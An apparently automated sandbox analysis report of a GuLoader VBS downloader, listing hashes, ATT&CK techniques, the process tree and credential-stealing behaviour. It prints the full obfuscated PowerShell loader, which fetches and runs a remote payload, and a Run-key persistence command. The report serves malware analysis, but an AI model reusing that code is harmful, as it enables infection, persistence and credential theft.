guloader | 78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6

Analysis

max time kernel
149s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
02-07-2024 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6.vbs
Size

22KB
MD5

003c272edd6f7cf2b08bfc98d1d48c7c
SHA1

a6ee590e3b81dbbce6e550c6dba9256c76cd4e21
SHA256

78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6
SHA512

4a251916c7e5bef128493ca4f9c303288d9f5934f763f5c383ebf99a671686359cacd977913260ed1c6a3c2e4df36a57873bf4620f7395a70d7eb1b82deb3213
SSDEEP

384:clzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww5Bpg3KU7a4i:ozSR022X/523S0e8xPPmKpgY4Rr0j

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/3492-55-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/1408-54-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral2/memory/3492-55-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/1408-54-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4264-61-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3492-55-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1408-54-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

16 3064 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe

flow	pid	process
16	3064	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Likvidationsprovenuet = "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\\Redistributing\\').Katalognavnet;%Hippenes% ($Ellis)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

1744 wab.exe
1744 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2856 powershell.exe
1744 wab.exe

pid	process
1744	wab.exe
1744	wab.exe

pid	process
2856	powershell.exe
1744	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 2856 set thread context of 1744	2856	powershell.exe	wab.exe
PID 1744 set thread context of 1408	1744	wab.exe	wab.exe
PID 1744 set thread context of 3492	1744	wab.exe	wab.exe
PID 1744 set thread context of 4264	1744	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5012 reg.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid process

3064 powershell.exe
3064 powershell.exe
2856 powershell.exe
2856 powershell.exe
2856 powershell.exe
2856 powershell.exe
1408 wab.exe
1408 wab.exe
4264 wab.exe
4264 wab.exe
1408 wab.exe
1408 wab.exe
Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exewab.exe

pid process

2856 powershell.exe
1744 wab.exe
1744 wab.exe
1744 wab.exe
1744 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 3064 powershell.exe
Token: SeDebugPrivilege 2856 powershell.exe
Token: SeDebugPrivilege 4264 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1744 wab.exe

pid	process
5012	reg.exe

pid	process
3064	powershell.exe
3064	powershell.exe
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
1408	wab.exe
1408	wab.exe
4264	wab.exe
4264	wab.exe
1408	wab.exe
1408	wab.exe

pid	process
2856	powershell.exe
1744	wab.exe
1744	wab.exe
1744	wab.exe
1744	wab.exe

description	pid	process
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	4264	wab.exe

pid	process
1744	wab.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 4892 wrote to memory of 3064	4892	WScript.exe	powershell.exe
PID 4892 wrote to memory of 3064	4892	WScript.exe	powershell.exe
PID 3064 wrote to memory of 1492	3064	powershell.exe	cmd.exe
PID 3064 wrote to memory of 1492	3064	powershell.exe	cmd.exe
PID 3064 wrote to memory of 2856	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 2856	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 2856	3064	powershell.exe	powershell.exe
PID 2856 wrote to memory of 1096	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 1096	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 1096	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 1744	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 1744	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 1744	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 1744	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 1744	2856	powershell.exe	wab.exe
PID 1744 wrote to memory of 676	1744	wab.exe	cmd.exe
PID 1744 wrote to memory of 676	1744	wab.exe	cmd.exe
PID 1744 wrote to memory of 676	1744	wab.exe	cmd.exe
PID 676 wrote to memory of 5012	676	cmd.exe	reg.exe
PID 676 wrote to memory of 5012	676	cmd.exe	reg.exe
PID 676 wrote to memory of 5012	676	cmd.exe	reg.exe
PID 1744 wrote to memory of 1408	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 1408	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 1408	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 1408	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3464	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3464	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3464	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3492	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3492	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3492	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 3492	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 4264	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 4264	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 4264	1744	wab.exe	wab.exe
PID 1744 wrote to memory of 4264	1744	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
3⤵
PID:1492

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
4⤵
PID:1096

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
5⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:5012

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eeiovaghdz"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1408

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ogngwtrjrhgyz"
5⤵
PID:3464

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ogngwtrjrhgyz"
5⤵
- Accesses Microsoft Outlook accounts
PID:3492

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zatzwlbcfpydcqig"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=996,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=3808 /prefetch:8
1⤵
PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bszf2tdm.nka.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\eeiovaghdz
Filesize
4KB

MD5
91227a2f05c7f74f6ebd1535a3f05b7b

SHA1
1ce317a272d67e3ac284948e49e6bc0acaee2e6d

SHA256
2967c8bcad47ab6cb88bf5b60a3a75b49f471a943d33c9b69aa7bfe1b763cfd2

SHA512
9ff9f6d2fb2880812fce42b91388e8b825483bb2df0976b9c630c397fed68f3625f4ba32d65933de0018b6e18554315152a1df00c98313d19612403076079a40

Download Submit
C:\Users\Admin\AppData\Roaming\Kasinoerne.Pri
Filesize
477KB

MD5
9dec6ab653d40ef8f841947c14b6143c

SHA1
86e240db138ee3125bd7ee57eba79d6fafcbe5cc

SHA256
14c0d60842557cbd3a432fcd7ad8c4c0bd0e33340f88dc917186aa81df2f1656

SHA512
58201866e93b4f21e381d4a9c1efe9bb3a441e27c391bb331611f48b0008ec6e6fe0f89a933beb7e8331a494bddcb62eccaddb648247daaf4f608b04989634b5

Download Submit
memory/1408-50-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1408-54-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1408-52-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1744-73-0x000000001F680000-0x000000001F699000-memory.dmp

Filesize
100KB

Download
memory/1744-74-0x000000001F680000-0x000000001F699000-memory.dmp

Filesize
100KB

Download
memory/1744-70-0x000000001F680000-0x000000001F699000-memory.dmp

Filesize
100KB

Download
memory/1744-45-0x0000000002260000-0x000000000356E000-memory.dmp

Filesize
19.1MB

Download
memory/2856-35-0x0000000006D40000-0x0000000006D62000-memory.dmp

Filesize
136KB

Download
memory/2856-18-0x00000000053E0000-0x0000000005446000-memory.dmp

Filesize
408KB

Download
memory/2856-31-0x0000000005B90000-0x0000000005BDC000-memory.dmp

Filesize
304KB

Download
memory/2856-32-0x0000000007330000-0x00000000079AA000-memory.dmp

Filesize
6.5MB

Download
memory/2856-33-0x0000000006070000-0x000000000608A000-memory.dmp

Filesize
104KB

Download
memory/2856-34-0x0000000006DB0000-0x0000000006E46000-memory.dmp

Filesize
600KB

Download
memory/2856-15-0x00000000021C0000-0x00000000021F6000-memory.dmp

Filesize
216KB

Download
memory/2856-36-0x0000000007F60000-0x0000000008504000-memory.dmp

Filesize
5.6MB

Download
memory/2856-29-0x00000000054C0000-0x0000000005814000-memory.dmp

Filesize
3.3MB

Download
memory/2856-38-0x0000000008510000-0x000000000981E000-memory.dmp

Filesize
19.1MB

Download
memory/2856-19-0x0000000005450000-0x00000000054B6000-memory.dmp

Filesize
408KB

Download
memory/2856-16-0x0000000004C50000-0x0000000005278000-memory.dmp

Filesize
6.2MB

Download
memory/2856-17-0x0000000005280000-0x00000000052A2000-memory.dmp

Filesize
136KB

Download
memory/2856-30-0x0000000005AE0000-0x0000000005AFE000-memory.dmp

Filesize
120KB

Download
memory/3064-48-0x00007FF94AF30000-0x00007FF94B9F1000-memory.dmp

Filesize
10.8MB

Download
memory/3064-0-0x00007FF94AF33000-0x00007FF94AF35000-memory.dmp

Filesize
8KB

Download
memory/3064-12-0x00007FF94AF30000-0x00007FF94B9F1000-memory.dmp

Filesize
10.8MB

Download
memory/3064-11-0x00007FF94AF30000-0x00007FF94B9F1000-memory.dmp

Filesize
10.8MB

Download
memory/3064-1-0x0000021C7E660000-0x0000021C7E682000-memory.dmp

Filesize
136KB

Download
memory/3492-55-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3492-51-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3492-53-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4264-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4264-56-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4264-61-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download